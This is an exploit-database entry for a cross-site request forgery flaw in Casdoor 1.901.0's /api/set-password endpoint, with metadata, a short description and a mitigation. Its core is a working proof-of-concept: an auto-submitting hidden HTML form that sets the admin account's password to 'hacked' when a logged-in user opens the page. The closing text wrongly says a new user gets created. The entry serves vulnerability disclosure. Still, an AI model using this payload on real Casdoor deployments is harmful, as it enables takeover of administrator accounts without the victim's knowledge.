header-logo
Suggest Exploit
vendor:
Casdoor
by:
Van Lam Nguyen
4.1
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Casdoor
Affected Version From: 1.901.0
Affected Version To: 1.901.0
Patch Exists: NO
Related CWE:
CPE: casdoor
Metasploit:
Other Scripts:
Platforms Tested: Windows
2024

Casdoor 1.901.0 – Cross-Site Request Forgery (CSRF)

Casdoor version 1.901.0 and below has a Cross-Site Request Forgery (CSRF) vulnerability in the /api/set-password endpoint. This vulnerability allows attackers to change a victim user's password through a maliciously crafted URL.

Mitigation:

To mitigate this vulnerability, it is recommended to implement anti-CSRF tokens in the application to validate and authenticate requests, ensuring that actions are performed by the intended user.
Source

Exploit-DB raw data:

# Exploit Title: Casdoor 1.901.0 - Cross-Site Request Forgery (CSRF)
# Application: Casdoor
# Version: 1.901.0
# Date: 03/07/2024
# Exploit Author: Van Lam Nguyen 
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v1.901.0.zip
# Tested on: Windows
# CVE : N/A

Overview
==================================================
Casdoor v1.901.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. 
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.

Proof of Concept
==================================================

Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step

<html>
<form action="http://localhost:8000/api/set-password" method="POST">
    <input name='userOwner' value='built&#45;in' type='hidden'>
    <input name='userName' value='admin' type='hidden'>
    <input name='newPassword' value='hacked' type='hidden'>
    <input type=submit>
</form>
<script>
    history.pushState('', '', '/');
    document.forms[0].submit();
</script>

</html>

If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials

userOwner: built&#45;in
userName: admin
newPassword: hacked

Navigation

Suggest Exploit

Services By CQR